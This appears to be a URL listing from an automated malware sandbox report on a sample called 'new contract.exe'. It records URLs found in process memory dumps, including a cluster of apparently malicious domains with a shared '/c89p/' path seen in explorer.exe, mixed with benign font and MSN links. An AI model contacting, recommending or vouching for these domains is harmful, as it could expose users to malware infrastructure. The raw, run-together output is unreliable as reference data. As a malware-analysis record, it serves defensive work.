                                                      http://www.livialiving.onlineexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.fontbureau.com/designersnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.aycare-service-99683.bondexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://excel.office.comexplorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.sajatypeworks.comnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cn/cThenew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.torehousestudio.infoexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.igmoto.info/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.ldkp.netexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.oviepicker.net/c89p/www.hinawinner.topexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.r64mh1.vipReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.sakkal.com8Wnew contract.exe, 00000000.00000002.1743134989.0000000005904000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.arklife.shop/c89p/www.sofaerb.shopexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.galapagosdesign.com/DPleasenew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.uickautoquote.net/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000002.4141038919.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1762772794.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.urwpp.deDPleasenew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.x-design-courses-29670.bond/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.zhongyicts.com.cnnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://wns.windows.com/Lexplorer.exe, 00000003.00000000.1762772794.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.innivip.bio/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://word.office.comexplorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.plesacv.xyzexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.innivip.bio/c89p/www.aser-cap-hair-growth.todayexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.arklife.shopexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.sofaerb.shopexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://schemas.micrexplorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.oviepicker.netexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.r64mh1.vipexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.carterandcone.comlnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.olar-systems-panels-61747.bond/c89p/www.arklife.shopexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.uickautoquote.netReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://outlook.com_explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.aycare-service-99683.bondReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.torehousestudio.info/c89p/explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.fontbureau.com/designersGnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://schemas.miexplorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.fontbureau.com/designers/?new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.plesacv.xyzReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.founder.com.cn/cn/bThenew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.fontbureau.com/designers?new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.sofaerb.shop/c89p/www.uickautoquote.netexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.tiro.comnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.innivip.bioReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.goodfont.co.krnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.uickautoquote.netexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://schemas.microexplorer.exe, 00000003.00000000.1755546236.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4136528142.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1749262863.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.aser-cap-hair-growth.todayReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.aser-cap-hair-growth.todayexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.typography.netDnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.galapagosdesign.com/staff/dennis.htmnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.hinawinner.topReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://api.msn.com/qexplorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
